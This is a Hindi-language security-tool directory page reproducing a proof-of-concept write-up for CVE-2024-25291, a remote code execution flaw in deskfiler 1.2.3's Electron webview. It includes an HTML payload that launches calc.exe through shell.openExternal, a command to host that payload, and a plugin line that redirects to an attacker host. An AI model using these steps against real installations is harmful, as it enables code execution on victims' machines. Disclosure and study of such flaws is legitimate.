Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 ओपन रीडायरेक्ट एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2024-25291
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 ओपन रीडायरेक्ट एक्सप्लॉइट

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DeskFiler RCE

CVE-2024-25291 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

deskfiler - 1.2.3 एप्लिकेशन में इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड इस रिपॉजिटरी में एक उदाहरण भेद्य एप्लिकेशन और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण है।

एक PoC के रूप में एक पायथन फ़ाइल है जो प्रक्रिया को स्वचालित करती है।

1.भेद्यता अवलोकन:

  • भेद्यता विषय: RCE के माध्यम से ओपन रिडायरेक्ट
  • भेद्यता संस्करण: deskfiler-1.2.3
  • समस्या का प्रकटीकरण: इलेक्ट्रॉन वेबव्यू
  • हमले का प्रकार: रिमोट कोड निष्पादन
  • हमले के वेक्टर: भेद्यता का शोषण करने के लिए, किसी को प्लग-इन खोलना होगा।
  • आरक्षित CVE संख्या: CVE-2024-25291

2. भेद्यता का कारण:

  • शोषण स्पष्टीकरण
    • एप्लिकेशन के एक विशिष्ट अनुभाग में, इलेक्ट्रॉन के माध्यम से एक वेबव्यू के माध्यम से एक बाहरी लिंक तक पहुँचने वाले अनुभाग की पुष्टि की जा सकती है। इसलिए, इसके माध्यम से, हमलावर के सर्वर से कनेक्ट करके RCE प्राप्त करना संभव है।

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

  • चरण 1) हमलावर का सर्वर तैयार करें और दुर्भावनापूर्ण प्लग-इन बनाएं।
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ यदि आप इसे जल्दी से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के PC पर एक सर्वर बनाएं।

root@kitploit:~
$ python -m http.server 80

नोट: ※ इस समय, यह माना जाता है कि प्लग-इन हमलावर द्वारा उत्पन्न एक प्लग-इन है, और यह केवल एक सामान्य प्लग-इन है जिसमें हमलावर सर्वर तक पहुँचने के लिए कोड जोड़ा गया है। सरल परीक्षण के लिए BareBone चुना गया है। deskfiler1

उसके बाद, BareBone फ़ोल्डर पथ में index.js फ़ाइल में निम्नलिखित कोड जोड़ें।

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • चरण 2) पीड़ित के सर्वर पर, Deskfiler चलाएँ और "Add new plugin" के माध्यम से BareBone प्लग-इन स्थापित करें। deskfiler2

deskfiler3


3. अतिरिक्त जानकारी

इस PoC में, हमने एक प्लग-इन का उपयोग किया; हालांकि, हम मानते हैं कि वैकल्पिक हमले वैक्टर के साथ, स्वतंत्र रूप से रिमोट कोड निष्पादन (RCE) प्राप्त करना संभव है। इसके अतिरिक्त, यदि सर्वर-साइड भेद्यताएं जैसे Stored XSS, Reflected XSS मौजूद हैं, तो RCE भी संभव माना जाता है।

टूल डाउनलोड करें